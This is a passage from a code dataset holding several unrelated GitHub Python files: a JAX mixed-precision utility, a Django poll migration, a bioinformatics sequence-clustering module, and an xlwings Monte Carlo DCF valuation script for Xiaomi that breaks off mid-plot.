tree['buffers']['mixed_precision']\n del tree['buffers']['mixed_precision']\n\n half_tree = su.structure_tree_map(cast_node, tree)\n half_tree['buffers']['mixed_precision'] = mixed_precision_buffers\n return half_tree\n \ndef cast_back(tree):\n half_params_buffers, rest = su.split_tree(tree, [['params', 'buffers'], ['aux', 'apply']])\n mixed_precision_buffers = half_params_buffers['buffers']['mixed_precision']\n del half_params_buffers['buffers']['mixed_precision']\n types = mixed_precision_buffers['types']\n\n def cast(x, t):\n return x.astype(t.dtype)\n\n params_buffers = tree_map(cast, half_params_buffers, types)\n params_buffers['buffers']['mixed_precision'] = mixed_precision_buffers\n return su.merge_trees(rest, params_buffers)\n\n\n@custom_vjp\ndef scale_in_backwards(x, s):\n return x\n\ndef scale_in_backwards_fwd(x, s):\n return scale_in_backwards(x, s), s\n\ndef scale_in_backwards_bwd(s, g):\n return g * s, 0.0\n\nscale_in_backwards.defvjp(scale_in_backwards_fwd, scale_in_backwards_bwd)\n\n# currently assumes first argument of loss is the tree and second return value is the loss.\ndef mixed_precision_loss(loss):#, loss_scalar=1.0, output_type=jnp.float32):\n # loss_scalar = jnp.array(loss_scalar)\n def 
mixed_loss(tree, *args, **kwargs):\n\n loss_scalar = tree['buffers']['mixed_precision']['loss_scalar']\n output_type = tree['aux']['mixed_precision']['output_type']\n # half_tree = su.structure_tree_map(cast_node, float_tree)\n # half_tree['buffers']['mixed_precision'] = {\n # 'loss_scalar': jnp.array(loss_scalar, dtype=jnp.float16),\n # }\n\n # half_tree['aux']['mixed_precision'] = {\n # 'output_type': output_type\n # }\n tree = su.map_params_buffers(lambda x: scale_in_backwards(x, 1.0/loss_scalar), tree)\n (tree, value, *rest) = loss(tree, *args, **kwargs)\n value = scale_in_backwards(value, loss_scalar.astype(output_type))\n return (tree, value, *rest)\n return mixed_loss\n\n\ndef mixed_precision_tree(tree_and_config, loss_scalar=1.0, output_type=jnp.float32):\n float_tree = tree_and_config[0]\n config = tree_and_config[1]\n\n root_apply = float_tree['apply']\n half_tree = su.structure_tree_map(cast_node, float_tree)\n\n half_tree['buffers']['mixed_precision'] = {\n 'loss_scalar': jnp.array(loss_scalar, dtype=jnp.float16),\n }\n\n half_tree['aux']['mixed_precision'] = {\n 'output_type': output_type\n }\n\n config['mixed_precision'] = True\n\n return half_tree, config\n","repo_name":"optimizedlearning/brachy","sub_path":"brachy/optim/mixed_precision.py","file_name":"mixed_precision.py","file_ext":"py","file_size_in_byte":4700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70502009388","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Constituency',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('constituency_name', models.CharField(max_length=255)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Party',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('party_name', models.CharField(max_length=255)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Question',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('will_you_vote', models.BooleanField()),\n ('constituency', models.ForeignKey(to='vote.Constituency')),\n ('party', models.ForeignKey(to='vote.Party')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n ]\n","repo_name":"crackersthecat/voting-straw-poll","sub_path":"vote/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1155363885","text":"#!/usr/bin/env python\nimport biotools.sequence as sequ\nimport biotools.IO as io\nimport biotools.translate as tran\nimport biotools.clustal as clustal\nimport biotools.analysis.options as options\ntry:\n import Queue as queue\nexcept ImportError:\n import queue\nimport hashlib\nimport subprocess\nimport threading\nfrom os import sep, mkdir\n\n\ndef run(direc, inputs):\n '''\n Takes a collection of files generated by gene prediction, creates clusters\n based off of the genes that have homology to those predicted genes, and\n creates new fasta files in the clusters sub directory under the given\n directory and separated according to whether they are nucleotide or amino\n 
acid sequences. These new fasta files are then used to create clustalw\n alignments of the genes if more than 1 sequence exists in the fasta file.\n '''\n\n clusters = {}\n all_ids = set()\n ids = {}\n q = queue.Queue()\n filenames = []\n\n def run_clustal():\n while not q.empty():\n cid = q.get()\n dig = hashlib.md5()\n dig.update(' '.join(cid))\n dig = dig.hexdigest()\n\n fpre = direc + 'nt' + sep + dig\n apre = direc + 'aa' + sep + dig\n fname = fpre + \".fasta\"\n aname = apre + \".fasta\"\n\n fh = io.open(fname, 'w')\n ah = io.open(aname, 'w')\n for ipt in clusters:\n counter = 0\n name = '_'.join(ipt.split(sep)[-1].split('.')[0].split())\n for cluster in clusters[ipt]:\n if cid & cluster[0]:\n nm = name + '_' + str(counter)\n seq = cluster[1]\n curr = sequ.Sequence(nm, seq, defline=', '.join(cid))\n tr = tran.translate(curr)\n tr.name = curr.name\n fh.write(curr)\n ah.write(tr)\n counter += 1\n fh.close()\n ah.close()\n\n try:\n clustal.run(fname, fpre + '.clustalw')\n clustal.run(aname, apre + '.clustalw')\n filenames.append(dig + '.fasta')\n except ValueError:\n pass\n\n q.task_done()\n\n if direc:\n for d in [direc, direc + 'nt' + sep, direc + 'aa' + sep]:\n try:\n mkdir(d)\n except OSError:\n pass\n\n for ipt in inputs:\n seqs = {}\n ids[ipt] = set()\n for seq in io.open(ipt, 'r'):\n ids[ipt].add(seq.name)\n all_ids.add(seq.name)\n if seq.seq not in seqs:\n seqs[seq.seq] = set()\n seqs[seq.seq].add(seq.name)\n clusters[ipt] = [(seqs[k], k) for k in seqs]\n del seqs\n\n sub_ids = []\n while all_ids:\n cid = all_ids.pop()\n subcluster = (all_ids | set([cid])) & \\\n set(i for ipt in clusters for cluster in clusters[ipt]\n for i in cluster[0] if cid in cluster[0])\n\n for ipt in clusters:\n for cluster in clusters[ipt]:\n if cid in cluster[0]:\n subcluster = (subcluster & cluster[0]) | \\\n (subcluster - ids[ipt])\n sub_ids.append(subcluster)\n all_ids -= subcluster\n\n for cid in sub_ids:\n q.put(cid)\n\n threads = []\n for i in range(options.NUM_PROCESSES - 1):\n curr = threading.Thread(target=run_clustal)\n threads.append(curr)\n curr.start()\n run_clustal()\n q.join()\n return filenames\n","repo_name":"sonwell/biotools","sub_path":"src/analysis/cluster.py","file_name":"cluster.py","file_ext":"py","file_size_in_byte":3573,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"2874639727","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[195]:\n\n\nimport xlwings as xw\nfrom xlwings import constants\nimport pandas as pd\nimport random\nimport numpy as np\nfrom numpy.random import uniform\nimport matplotlib.pyplot as plt\n\n\n# let's connect the excel document\n\n# In[196]:\n\n\nbook=xw.Book(\"xiaomi PYTHON.xlsm\")\nbook.sheets\nassumptions_sht = book.sheets(\"Python simulation\")\nsimu_sht=book.sheets(\"Python output\")\n\n\n# # 1) Initialize parameters \n\n# In[197]:\n\n\nnum_sim = 1000\n\n# growth (smartphone) \ng1_low=assumptions_sht.range('l9').value\ng1_mid=assumptions_sht.range('m9').value\ng1_high=assumptions_sht.range('n9').value\n# growth (TV)\ng2_low = assumptions_sht.range('l10').value\ng2_mid = assumptions_sht.range('m10').value\ng2_high = assumptions_sht.range('n10').value\n# growth (Internet)\ng3_low = assumptions_sht.range('l11').value\ng3_mid = assumptions_sht.range('m11').value\ng3_high = assumptions_sht.range('n11').value\n\n# growth (others)\ng4_low = assumptions_sht.range('l12').value\ng4_mid = assumptions_sht.range('m12').value\ng4_high = assumptions_sht.range('n12').value\n\n#cost 
1\nc1_low=assumptions_sht.range('l15').value\nc1_mid=assumptions_sht.range('m15').value\nc1_high=assumptions_sht.range('n15').value\n#cost2\nc2_low = assumptions_sht.range('l16').value\nc2_mid=assumptions_sht.range('m16').value\nc2_high=assumptions_sht.range('n16').value\n\n#cost3\nc3_low = assumptions_sht.range('l17').value\nc3_mid=assumptions_sht.range('m17').value\nc3_high=assumptions_sht.range('n17').value\n\n#cost4\nc4_low = assumptions_sht.range('l18').value\nc4_mid=assumptions_sht.range('m18').value\nc4_high=assumptions_sht.range('n18').value\n\n#SG&A\nsga_low = assumptions_sht.range('l20').value\nsga_high = assumptions_sht.range('n20').value\n\n#R&D\nrd_low = assumptions_sht.range('l21').value\nrd_high = assumptions_sht.range('n21').value\n\n#beta unlevered\nbetaun_mean=assumptions_sht.range('J24').value\nbetaun_std=assumptions_sht.range('K24').value\n\n#RONIC\nroic_mean = assumptions_sht.range('J25').value\nroic_std = assumptions_sht.range('K25').value\n\n#perpet growth\npg_mean =assumptions_sht.range('J26').value\npg_std = assumptions_sht.range('K26').value\n\n#ev/ebitda\nev_ebitda_low = assumptions_sht.range('l27').value\nev_ebitda_mid = assumptions_sht.range('m27').value\nev_ebitda_high = assumptions_sht.range('n27').value\n\n#ev/sales\nev_sales_low = assumptions_sht.range('l28').value\nev_sales_mid = assumptions_sht.range('m28').value\nev_sales_high = assumptions_sht.range('n28').value\n\n#equity market premium\nemp_mean =assumptions_sht.range('J29').value\nemp_std = assumptions_sht.range('K29').value\n\n\n# # 2) define law of distribution for each variable\n\n# In[198]:\n\n\ndef dcf_function (num_sim, g1_low, g1_mid,g1_high, g2_low, g2_mid,g2_high,g3_low, g3_mid,g3_high,g4_low, g4_mid,g4_high,\n c1_low,c1_mid,c1_high,c2_low,c2_mid,c2_high,c3_low,c3_mid,c3_high,c4_low,c4_mid,c4_high,sga_low,sga_high,\n rd_low,rd_high,betaun_mean,betaun_std,roic_mean,roic_std,pg_mean,pg_std,ev_ebitda_low,ev_ebitda_mid,\n ev_ebitda_high,ev_sales_low,ev_sales_mid,ev_sales_high,emp_mean,emp_std):\n simu_sht.clear()\n outcome = []\n \n for i in range (num_sim) :\n # a) growth rate (triangular distribution)\n g1_rate = np.random.triangular(g1_low,g1_mid,g1_high)\n assumptions_sht.range('D9').value = g1_rate\n g2_rate = np.random.triangular(g2_low,g2_mid,g2_high)\n assumptions_sht.range('D10').value = g2_rate\n g3_rate = np.random.triangular(g3_low,g3_mid,g3_high)\n assumptions_sht.range('D11').value = g3_rate\n g4_rate = np.random.triangular(g4_low,g4_mid,g4_high)\n assumptions_sht.range('D12').value = g4_rate\n \n #b) costs (triangular distribution)\n c1_rate = np.random.triangular(c1_low,c1_mid,c1_high)\n assumptions_sht.range('d15').value= c1_rate\n c2_rate = np.random.triangular(c2_low,c2_mid,c2_high)\n assumptions_sht.range('d16').value= c2_rate\n c3_rate = np.random.triangular(c3_low,c3_mid,c3_high)\n assumptions_sht.range('d17').value= c3_rate\n c4_rate = np.random.triangular(c4_low,c4_mid,c4_high)\n assumptions_sht.range('d18').value= c4_rate\n \n #uniform ditribution\n sga_rate=np.random.uniform(sga_low,sga_high)\n assumptions_sht.range('d20').value=sga_rate\n rd_rate=np.random.uniform(rd_low,rd_high)\n assumptions_sht.range('d21').value=rd_rate\n \n #c) valuation assumptions unlevered beta, roic, perpetual , ev/ebitda....\n betaun_rate=random.normalvariate(betaun_mean,betaun_std)\n assumptions_sht.range('d24').value= betaun_rate\n roic_rate=random.normalvariate(roic_mean,roic_std)\n assumptions_sht.range('d25').value=roic_rate\n pg_rate=random.normalvariate(pg_mean,pg_std)\n 
assumptions_sht.range('d26').value=pg_rate\n ev_ebitda_rate=np.random.triangular(ev_ebitda_low,ev_ebitda_mid,ev_ebitda_high)\n assumptions_sht.range('d27').value=ev_ebitda_rate\n ev_sales_rate=np.random.triangular(ev_sales_low,ev_sales_mid,ev_sales_high)\n assumptions_sht.range('d28').value=ev_sales_rate\n emp_rate=random.normalvariate(emp_mean,emp_std)\n assumptions_sht.range('d29').value= emp_rate\n \n #d) value per share\n price=assumptions_sht.range('d2').value\n price=float(price)\n\n outcome.append((g1_rate,g2_rate,g3_rate,g4_rate,c1_rate,c2_rate,c3_rate,c4_rate,sga_rate,rd_rate,betaun_rate,\n roic_rate,pg_rate,ev_ebitda_rate,ev_sales_rate,emp_rate,price))\n df = pd.DataFrame(outcome, columns = ['Smartphone growth', 'TV growth', 'Internet Services growth', 'Others growth',\n 'cost smartphone','cost TV','cost internet services','cost others', 'SG&A cost',\n 'R&D cost','beta unlevered','RONIC','Perpetual growth TV','EV/EBITDA','EV/Sales',\n 'Equity market premium','Value per share'])\n return df\n\n\n# # 3) running the function\n\n# In[199]:\n\n\ndf = dcf_function (num_sim, g1_low, g1_mid,g1_high, g2_low, g2_mid,g2_high,g3_low, g3_mid,g3_high,g4_low, g4_mid,g4_high,\n c1_low,c1_mid,c1_high,c2_low,c2_mid,c2_high,c3_low,c3_mid,c3_high,c4_low,c4_mid,c4_high,sga_low,sga_high,\n rd_low,rd_high,betaun_mean,betaun_std,roic_mean,roic_std,pg_mean,pg_std,ev_ebitda_low,ev_ebitda_mid,\n ev_ebitda_high,ev_sales_low,ev_sales_mid,ev_sales_high,emp_mean,emp_std)\n\n\n# In[200]:\n\n\n# Append all the values in simu_sht in our excel.\nsimu_sht.range('A1').options(pd.DataFrame, index = False).value = df\n\n\n# # 4) generate graphes\n\n# #### Giving names to output\n\n# In[201]:\n\n\n#growth \ng1_column = df['Smartphone growth']\ng2_column = df['TV growth']\ng3_column = df['Internet Services growth']\ng4_column = df['Others growth']\n#costs\nc1_column = df['cost smartphone']\nc2_column = df['cost TV']\nc3_column = df['cost internet services']\nc4_column = df['cost others']\nsga_column = df['SG&A cost']\nrd_column = df['R&D cost']\n#valuation assumptions\nbetaun_column = df['beta unlevered']\nroic_column = df['RONIC']\npg_column = df['Perpetual growth TV']\nev_ebitda_column = df['EV/EBITDA']\nev_sales_column = df['EV/Sales']\nemp_column = df['Equity market premium']\nprice_column = df['Value per share']\n\n# plot style\nplt.style.use('default')\n\n\n# #### plotting the outcome\n\n# In[202]:\n\n\na=int(num_sim*0.10)\n\n# histogram of value per share\ngraph1 =plt.figure(figsize=(5,5))\nax = graph1.add_subplot(1, 1, 1)\ngraph1.patch.set_facecolor('none')\nax.patch.set_facecolor('none')\nplt.hist(price_column, density = True,bins = a,color='#132e57')\nplt.ylabel('Frequency (%)')\nplt.xlabel('CNY value per share')\nplt.title('Distribution of value per share', fontsize = 12,fontweight='bold')\nplt.axvline(price_column.mean(), label ='average price', color= '#ee9835')\nplt.axvline(assumptions_sht.range('g2').value, label ='Current stock price', color= '#3691a1')\n\nplt.legend()\nplt.grid(visible='none',axis='y',color='none')\nplt.grid(visible='none',axis='x',color='none')\nrng = simu_sht.range(\"r1\")\nsimu_sht.pictures.add(graph1, name = 'graph1', update = True,top = rng.top,left = rng.left)\n\n# creation of cumulative distribution function\ngraph2 =plt.figure(figsize=(5,5))\nax = graph2.add_subplot(1, 1, 1)\ngraph2.patch.set_facecolor('none')\nax.patch.set_facecolor('none')\nx=np.sort(price_column)\ny=np.arange(1,len(x)+1)/len(x)\nplt.plot(x,y, marker = '.', color='#132e57')\nplt.xlabel(\"CNY Value per 
share\")\nplt.ylabel ('cumulated distribution')\nplt.title ('Cumulative Distribution function', fontsize = 12,fontweight='bold')\nplt.grid(visible='none',axis='y',color='none')\nplt.grid(visible='none',axis='x',color='none')\nrng = simu_sht.range(\"Z1\")\nsimu_sht.pictures.add(graph2, name = 'graph2', update = True,top = rng.top,left = rng.left)\n\n# SG&A\ngraph3 =plt.figure(figsize=(5,5))\nax = graph3.add_subplot(1, 1, 1)\ngraph3.patch.set_facecolor('none')\nax.patch.set_facecolor('none')\nplt.hist(sga_column, density = True,bins = a, color = '#fa621c')\nplt.ylabel('Occurence')\nplt.xlabel('SG&A (% of Revenue)')\nplt.title('Distribution of SG&A ', fontsize = 12,fontweight='bold')\nplt.grid(visible='none',axis='y',color='none')\nplt.grid(visible='none',axis='x',color='none')\nrng = simu_sht.range(\"r25\")\nsimu_sht.pictures.add(graph3, name = 'graph3', update = True,top = rng.top,left = rng.left)\n\n# R&D\ngraph4 =plt.figure(figsize=(5,5))\nax = graph4.add_subplot(1, 1, 1)\ngraph4.patch.set_facecolor('none')\nax.patch.set_facecolor('none')\nplt.hist(rd_column, density = True,bins = a, color = '#fa621c')\nplt.ylabel('Occurence')\nplt.xlabel('R&D (% of Revenue)')\nplt.title('Distribution of R&D',fontsize = 12,fontweight='bold')\nplt.grid(visible='none',axis='y',color='none')\nplt.grid(visible='none',axis='x',color='none')\nrng = simu_sht.range(\"Z25\")\nsimu_sht.pictures.add(graph4, name = 'graph4', update = True,top = rng.top,left = rng.left)\n\n# growth rates\ngraph5 =plt.figure(figsize=(5,5))\nax = graph5.add_subplot(1, 1, 1)\ngraph5.patch.set_facecolor('none')\nax.patch.set_facecolor('none')\nplt.hist(g1_column, density = True,bins = a, color = '#3691a1')\nplt.ylabel('Occurence')\nplt.xlabel('growth of smartphone segment (% of Revenue)')\nplt.title('Distribution of growth of smartphone segment', fontsize = 12,fontweight='bold')\nplt.grid(visible='none',axis='y',color='none')\nplt.grid(visible='none',axis='x',color='none')\nrng = simu_sht.range(\"r50\")\nsimu_sht.pictures.add(graph5, name = 'graph5', update = True,top = rng.top,left = rng.left)\n\ngraph6 =plt.figure(figsize=(5,5))\nax = graph6.add_subplot(1, 1, 1)\ngraph6.patch.set_facecolor('none')\nax.patch.set_facecolor('none')\nplt.hist(g2_column, density = True,bins = a, color = '#3691a1')\nplt.ylabel('Occurence')\nplt.xlabel('growth of TV segment (% of Revenue)')\nplt.title('Distribution of growth of TV segment', fontsize = 12,fontweight='bold')\nplt.grid(visible='none',axis='y',color='none')\nplt.grid(visible='none',axis='x',color='none')\nrng = simu_sht.range(\"Z50\")\nsimu_sht.pictures.add(graph6, name = 'graph6', update = True,top = rng.top,left = rng.left)\n\ngraph7 =plt.figure(figsize=(5,5))\nax = graph7.add_subplot(1, 1, 1)\ngraph7.patch.set_facecolor('none')\nax.patch.set_facecolor('none')\nplt.hist(g3_column, density = True,bins = a, color = '#3691a1')\nplt.ylabel('Occurence')\nplt.xlabel('growth of Internet Services segment (% of Revenue)')\nplt.title('Distribution of growth of Internet Services segment', fontsize = 12,fontweight='bold')\nplt.grid(visible='none',axis='y',color='none')\nplt.grid(visible='none',axis='x',color='none')\nrng = simu_sht.range(\"r75\")\nsimu_sht.pictures.add(graph7, name = 'graph7', update = True,top = rng.top,left = rng.left)\n\ngraph8 =plt.figure(figsize=(5,5))\nax = graph8.add_subplot(1, 1, 1)\ngraph8.patch.set_facecolor('none')\nax.patch.set_facecolor('none')\nplt.hist(g4_column, density = True,bins = a, color = '#3691a1')\nplt.ylabel('Occurence')\nplt.xlabel('growth of \"Others\" segment (% 
of Revenue)')\nplt.title('Distribution of \"Others\" segment', fontsize = 12,fontweight='bold')\nplt.grid(visible='none',axis='y',color='none')\nplt.grid(visible='none',axis='x',color='none')\nrng = simu_sht.range(\"Z75\")\nsimu_sht.pictures.add(graph8, name = 'graph8', update = True,top = rng.top,left = rng.left)\n\n\n\n# costs\ngraph9 =plt.figure(figsize=(5,5))\nax = graph9.add_subplot(1, 1, 1)\ngraph9.patch.set_facecolor('none')\nax.patch.set_facecolor('none')\nplt.hist(c1_column, density = True,bins = a, color = '#fa621c')\nplt.ylabel('Occurence')\nplt.xlabel('cost of smartphone segment (% of smartphone revenue)')\nplt.title('Distribution of cost of smartphone segment', fontsize = 12,fontweight='bold')\nplt.grid(visible='none',axis='y',color='none')\nplt.grid(visible='none',axis='x',color='none')\nrng = simu_sht.range(\"r100\")\nsimu_sht.pictures.add(graph9, name = 'graph9', update = True,top = rng.top,left = rng.left)\n\ngraph10 =plt.figure(figsize=(5,5))\nax = graph10.add_subplot(1, 1, 1)\ngraph10.patch.set_facecolor('none')\nax.patch.set_facecolor('none')\nplt.hist(c2_column, density = True,bins = a, color = '#fa621c')\nplt.ylabel('Occurence')\nplt.xlabel('cost of TV segment (% of TV revenue)')\nplt.title('Distribution of cost of TV segment', fontsize = 12,fontweight='bold')\nplt.grid(visible='none',axis='y',color='none')\nplt.grid(visible='none',axis='x',color='none')\nrng = simu_sht.range(\"Z100\")\nsimu_sht.pictures.add(graph10, name = 'graph10', update = True,top = rng.top,left = rng.left)\n\ngraph11 =plt.figure(figsize=(5,5))\nax = graph11.add_subplot(1, 1, 1)\ngraph11.patch.set_facecolor('none')\nax.patch.set_facecolor('none')\nplt.hist(c3_column, density = True,bins = a, color = '#fa621c')\nplt.ylabel('Occurence')\nplt.xlabel('cost of Internet Services segment (% of Internet Services revenue)')\nplt.title('Distribution of cost of Internet Services segment', fontsize = 12,fontweight='bold')\nplt.grid(visible='none',axis='y',color='none')\nplt.grid(visible='none',axis='x',color='none')\nrng = simu_sht.range(\"r125\")\nsimu_sht.pictures.add(graph11, name = 'graph11', update = True,top = rng.top,left = rng.left)\n\ngraph12 =plt.figure(figsize=(5,5))\nax = graph12.add_subplot(1, 1, 1)\ngraph12.patch.set_facecolor('none')\nax.patch.set_facecolor('none')\nplt.hist(c4_column, density = True,bins = a, color = '#fa621c')\nplt.ylabel('Occurence')\nplt.xlabel('cost of \"Others\" segment (% of \"Others\" revenue)')\nplt.title('Distribution of cost of \"Others\" segment', fontsize = 12,fontweight='bold')\nplt.grid(visible='none',axis='y',color='none')\nplt.grid(visible='none',axis='x',color='none')\nrng = simu_sht.range(\"Z125\")\nsimu_sht.pictures.add(graph12, name = 'graph12', update = True,top = rng.top,left = rng.left)\n\n# valuation assumptions\ngraph13 =plt.figure(figsize=(5,5))\nax = graph13.add_subplot(1, 1, 1)\ngraph13.patch.set_facecolor('none')\nax.patch.set_facecolor('none')\nplt.hist(betaun_column, density = True,bins = a, color = '#3691a1')\nplt.ylabel('Occurence')\nplt.xlabel('beta unlevered variation')\nplt.title('Distribution of beta unlevered variation', fontsize = 12,fontweight='bold')\nplt.grid(visible='none',axis='y',color='none')\nplt.grid(visible='none',axis='x',color='none')\nrng = simu_sht.range(\"r150\")\nsimu_sht.pictures.add(graph13, name = 'graph13', update = True,top = rng.top,left = rng.left)\n\ngraph14 =plt.figure(figsize=(5,5))\nax = graph14.add_subplot(1, 1, 1)\ngraph14.patch.set_facecolor('none')\nax.patch.set_facecolor('none')\nplt.hist(roic_column, 
density = True,bins = a, color = '#3691a1')\nplt.ylabel('Occurence')\nplt.xlabel('RONIC variation')\nplt.title('Distribution of RONIC variation',fontsize = 12,fontweight='bold')\nplt.grid(visible='none',axis='y',color='none')\nplt.grid(visible='none',axis='x',color='none')\nrng = simu_sht.range(\"Z150\")\nsimu_sht.pictures.add(graph14, name = 'graph14', update = True,top = rng.top,left = rng.left)\n\ngraph15 =plt.figure(figsize=(5,5))\nax = graph15.add_subplot(1, 1, 1)\ngraph15.patch.set_facecolor('none')\nax.patch.set_facecolor('none')\nplt.hist(pg_column, density = True,bins = a, color = '#3691a1')\nplt.ylabel('Occurence')\nplt.xlabel('Perpetual growth rate')\nplt.title('Distribution of perpetual growth rate', fontsize = 12,fontweight='bold')\nplt.grid(visible='none',axis='y',color='none')\nplt.grid(visible='none',axis='x',color='none')\nrng = simu_sht.range(\"r175\")\nsimu_sht.pictures.add(graph15, name = 'graph15', update = True,top = rng.top,left = rng.left)\n\ngraph16 =plt.figure(figsize=(5,5))\nax = graph16.add_subplot(1, 1, 1)\ngraph16.patch.set_facecolor('none')\nax.patch.set_facecolor('none')\nplt.hist(ev_ebitda_column, density = True,bins = a, color = '#3691a1')\nplt.ylabel('Occurence')\nplt.xlabel('EV-to-EBITDA variation')\nplt.title('Distribution of EV-to-EBITDA', fontsize = 12,fontweight='bold')\nplt.grid(visible='none',axis='y',color='none')\nplt.grid(visible='none',axis='x',color='none')\nrng = simu_sht.range(\"Z175\")\nsimu_sht.pictures.add(graph16, name = 'graph16', update = True,top = rng.top,left = rng.left)\n\ngraph17 =plt.figure(figsize=(5,5))\nax = graph17.add_subplot(1, 1, 1)\ngraph17.patch.set_facecolor('none')\nax.patch.set_facecolor('none')\nplt.hist(ev_sales_column, density = True,bins = a, color = '#3691a1')\nplt.ylabel('Occurence')\nplt.xlabel('EV-to-Sales variation')\nplt.title('Distribution of EV-to-Sales',fontsize = 12,fontweight='bold')\nplt.grid(visible='none',axis='y',color='none')\nplt.grid(visible='none',axis='x',color='none')\nrng = simu_sht.range(\"r200\")\nsimu_sht.pictures.add(graph17, name = 'graph17', update = True,top = rng.top,left = rng.left)\n\ngraph18 =plt.figure(figsize=(5,5))\nax = graph18.add_subplot(1, 1, 1)\ngraph18.patch.set_facecolor('none')\nax.patch.set_facecolor('none')\nplt.hist(emp_column, density = True,bins = a, color = '#3691a1')\nplt.ylabel('Occurence')\nplt.xlabel('Equity market premium variation')\nplt.title('Distribution of Equity market premium', fontsize = 12,fontweight='bold')\nplt.grid(visible='none',axis='y',color='none')\nplt.grid(visible='none',axis='x',color='none')\nrng = simu_sht.range(\"Z200\")\nsimu_sht.pictures.add(graph18, name = 'graph18', update = True,top = rng.top,left = rng.left)\n\n\n# #### details on some key statistics\n\n# In[203]:\n\n\ndesc_stat=df.describe()\nsimu_sht.range('R224').value = desc_stat\n\n\n# #### Correlation between each variable and Value per share\n\n# In[204]:\n\n\ncorr1 =plt.figure(figsize=(5,5))\nax = corr1.add_subplot(1, 1, 1)\ncorr1.patch.set_facecolor('none')\nax.patch.set_facecolor('none')\nplt.scatter(g1_column,price_column,color = '#3691a1')\nplt.ylabel('Value per share')\nplt.xlabel('Growth rates')\nplt.title('Correlation : Growth rates (smartphone) vs. 
Value per share', fontsize = 12,fontweight='bold')\nrng = simu_sht.range(\"al1\") \nsimu_sht.pictures.add(corr1, name = 'corr1', update = True,top = rng.top,left = rng.left)\n\ncorr2 =plt.figure(figsize=(5,5))\nax = corr2.add_subplot(1, 1, 1)\ncorr2.patch.set_facecolor('none')\nax.patch.set_facecolor('none')\nplt.scatter(g2_column,price_column,color = '#3691a1')\nplt.ylabel('Value per share')\nplt.xlabel('Growth rates')\nplt.title('Correlation : Growth rates (TV) vs. Value per share', fontsize = 12,fontweight='bold')\nrng = simu_sht.range(\"at1\") \nsimu_sht.pictures.add(corr2, name = 'corr2', update = True,top = rng.top,left = rng.left)\n\ncorr3 =plt.figure(figsize=(5,5))\nax = corr3.add_subplot(1, 1, 1)\ncorr3.patch.set_facecolor('none')\nax.patch.set_facecolor('none')\nplt.scatter(g3_column,price_column,color = '#3691a1')\nplt.ylabel('Value per share')\nplt.xlabel('Growth rates')\nplt.title('Correlation : Growth rates (Internet services) vs. Value per share', fontsize = 12,fontweight='bold')\nrng = simu_sht.range(\"al25\") \nsimu_sht.pictures.add(corr3, name = 'corr3', update = True,top = rng.top,left = rng.left)\n\ncorr4 =plt.figure(figsize=(5,5))\nax = corr4.add_subplot(1, 1, 1)\ncorr4.patch.set_facecolor('none')\nax.patch.set_facecolor('none')\nplt.scatter(g4_column,price_column,color = '#3691a1')\nplt.ylabel('Value per share')\nplt.xlabel('Growth rates')\nplt.title('Correlation : Growth rates (Others) vs. Value per share', fontsize = 12,fontweight='bold')\nrng = simu_sht.range(\"at25\") \nsimu_sht.pictures.add(corr4, name = 'corr4', update = True,top = rng.top,left = rng.left)\n\ncorr5 =plt.figure(figsize=(5,5))\nax = corr5.add_subplot(1, 1, 1)\ncorr5.patch.set_facecolor('none')\nax.patch.set_facecolor('none')\nplt.scatter(sga_column,price_column,color='#fa621c')\nplt.ylabel('Value per share')\nplt.xlabel('SG&A')\nplt.title('Correlation : SG&A vs. Value per share', fontsize = 12,fontweight='bold')\nrng = simu_sht.range(\"al50\") \nsimu_sht.pictures.add(corr5, name = 'corr5', update = True,top = rng.top,left = rng.left)\n\ncorr6 =plt.figure(figsize=(5,5))\nax = corr6.add_subplot(1, 1, 1)\ncorr6.patch.set_facecolor('none')\nax.patch.set_facecolor('none')\nplt.scatter(rd_column,price_column,color='#fa621c')\nplt.ylabel('Value per share')\nplt.xlabel('R&D')\nplt.title('Correlation : R&D vs. Value per share', fontsize = 12,fontweight='bold')\nrng = simu_sht.range(\"AT50\")\nsimu_sht.pictures.add(corr6, name = 'corr6', update = True,top = rng.top,left = rng.left)\n\ncorr7 =plt.figure(figsize=(5,5))\nax = corr7.add_subplot(1, 1, 1)\ncorr7.patch.set_facecolor('none')\nax.patch.set_facecolor('none')\nplt.scatter(c1_column,price_column,color='#fa621c')\nplt.ylabel('Value per share')\nplt.xlabel('Costs')\nplt.title('Correlation : Costs (smartphone) vs. Value per share', fontsize = 12,fontweight='bold')\nrng = simu_sht.range(\"al75\")\nsimu_sht.pictures.add(corr7, name = 'corr7', update = True,top = rng.top,left = rng.left)\n\ncorr8 =plt.figure(figsize=(5,5))\nax = corr8.add_subplot(1, 1, 1)\ncorr8.patch.set_facecolor('none')\nax.patch.set_facecolor('none')\nplt.scatter(c2_column,price_column,color='#fa621c')\nplt.ylabel('Value per share')\nplt.xlabel('Costs')\nplt.title('Correlation : Costs (TV) vs. 
